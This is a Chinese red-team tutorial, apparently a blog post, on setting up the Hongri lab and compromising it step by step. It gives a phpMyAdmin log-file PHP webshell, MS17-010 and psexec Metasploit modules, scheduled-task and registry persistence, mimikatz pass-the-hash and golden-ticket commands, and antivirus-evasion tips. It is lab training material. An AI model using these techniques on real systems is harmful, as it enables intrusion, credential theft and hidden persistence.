当前位置：首页 > article >正文

新手也能懂的红队实战：从零搭建红日靶场到内网渗透完整复盘（附环境包）

article 2026/4/12 4:31:59

红队实战入门从零构建红日靶场到内网渗透全流程解析环境准备与靶场搭建红日靶场作为国内知名的渗透测试学习环境其设计模拟了真实企业内网架构包含Web服务器、域控服务器和域成员主机。对于初学者而言正确搭建环境是后续所有操作的基础。我们先从虚拟机配置开始网络拓扑关键点Web服务器Windows 7需要配置双网卡NAT模式192.168.134.135外部访问VMnet1192.168.52.143内网通信域控服务器Windows Server 2008192.168.52.138域成员主机Windows Server 2003192.168.52.141注意所有虚拟机默认密码为hongrisec2019建议在实验环境中使用正式环境必须修改常见搭建问题解决方案问题现象可能原因解决方法虚拟机无法联网网卡模式错误检查VMnet1是否启用Host-Only模式靶机之间ping不通防火墙未关闭执行netsh advfirewall set allprofile state off服务无法启动系统时间错误调整虚拟机时间至2019年左右信息收集与漏洞探测完整的渗透测试中信息收集往往占据70%的工作量。在红日靶场中我们需要采用分层递进的收集策略基础信息扫描whatweb http://192.168.52.143 # 识别Web框架 dirsearch -u http://192.168.52.143 -e php # 目录扫描关键发现处理发现phpMyAdmin后台时应立即检查版本-- 通过文档文件判断版本 SELECT version; -- 检查导出权限 SHOW VARIABLES LIKE secure_file_priv;突破点选择矩阵漏洞类型利用难度适用场景工具推荐弱口令爆破★★☆存在登录接口Burp Suite目录遍历★☆☆存在索引漏洞御剑扫描器SQL注入★★★存在查询接口sqlmap权限获取与维持通过phpMyAdmin获取Webshell是本次渗透的关键转折点具体实现路径日志写入法详细步骤开启全局日志记录SET global general_log ON; SET global general_log_file C:/phpStudy/WWW/shell.php;写入恶意代码SELECT ?php eval($_POST[cmd]);?;使用蚁剑连接时需注意选择PHP类型连接编码设置为UTF-8超时时间调整为30000ms经验提示内网环境中建议优先使用冰蝎等工具其流量特征更隐蔽权限提升检查清单[ ] 查看系统补丁systeminfo[ ] 检查服务权限accesschk.exe -uwcqv Authenticated Users *[ ] 查找敏感文件dir /s *pass* *.config内网横向移动实战获取立足点后内网渗透需要系统化的推进策略域环境侦查命令集net group Domain Admins /domain # 查询域管理员 nltest /domain_trusts # 查询域信任关系 nslookup -typeSRV _ldap._tcp # 定位域控制器MS17-010漏洞利用优化方案使用Metasploit进行精准探测use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.52.141 set THREADS 3 run漏洞利用失败时的备选方案尝试psexec远程执行use exploit/windows/smb/psexec set SMBPass hongrisec2019 set SMBUser Administrator权限维持技巧创建计划任务schtasks /create /tn Update /tr C:\shell.exe /sc minute /mo 1注册表自启动reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Backup /t REG_SZ /d C:\shell.exe域控攻防与总结在最终获取域控权限的过程中有几个关键转折点值得注意哈希传递攻击(PTH)sekurlsa::pth /user:Administrator /domain:god.org /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0黄金票据制作kerberos::golden /admin:Administrator /domain:god.org /sid:S-1-5-21-1218 /krbtgt:310b643c5316c8c3c70a10cf8365e /ticket:golden.kirbi实战中遇到的典型问题及解决记录域控防火墙规则拦截通过已控主机执行netsh advfirewall firewall add rule nameRDP dirin actionallow protocolTCP localport3389杀软拦截mimikatz使用免杀版本或改用powershell版本横向移动速度慢设置set AutoRunScript post/windows/manage/migrate自动迁移进程

新手也能懂的红队实战：从零搭建红日靶场到内网渗透完整复盘（附环境包）

相关文章：

新手也能懂的红队实战：从零搭建红日靶场到内网渗透完整复盘（附环境包）

React 19实战：如何用最新特性打造Nano Banana无限画布（附完整代码）

HagiCode 为什么选择 Hermes 作为综合 Agent 核心菊

AI 大模型职业选择衣

【deepin】通过x11vnc与xrdp实现Windows无缝远程控制deepin桌面

Python：深入理解set_seed——确保机器学习实验的可重复性

芯片测试工程师必看：Mentor DFT OCC时钟控制器实战配置与三大设计模式详解

电解电容寿命预测：从理论公式到工程实践

ARM 架构 JuiceFS 性能优化：基于 MLPerf 的实践与调优汲

算法——暴力+优化

QWEN-AUDIO内容创作提效：营销文案→自然语音→一键导出WAV全流程

intv_ai_mk11 GPU算力适配案例：A10显存16GB下7B模型量化部署实操

Appium启动参数避坑指南：新手常犯的5个错误及解决方案

RadioHead嵌入式无线协议栈原理与STM32实战

从错误码到精准定位：307系列基站定位实战排障指南

【自动驾驶】从几何到代码：车辆运动学模型的推导与Python实践

HMC5883L磁力计驱动开发与磁场校准实战

Rust的匹配中的质量辅助

存储那么贵，何不白嫖飞书云文件空间还

如何用PDF Arranger轻松管理PDF文档：终极免费工具指南

逐行拆解 STM32F4-CAN-IAP：一份“代码即文档”的功能级说明书

Omron NX程序自动化电池焊接检测机：人机配方一键换型，智能故障记录与统计，EtherCA...

三菱FX3U PLC与变频器Modbus RTU通讯控制案例：实现启停、频率设定与读取功能...

Java的java.lang.runtime.ObjectMethods记录类方法自动生成的底层机制

ESP8266驱动1.44英寸ST7735 TFT屏的实战指南与图像显示优化

STM32开发效率翻倍：在Clion里集成DeepSeek Cline插件实现智能代码补全与调试

告别算法地狱！用XVF3800麦克风阵列快速打造智能语音产品（附开发板选型指南）

放弃CMSIS-DSP？实测STM32H7优化RNNoise神经网络运算的几种思路与效果对比

当图论遇到优化：手把手教你用分支限界法解决带权顶点覆盖问题（C++实现）

Go语言的sync.RWMutex读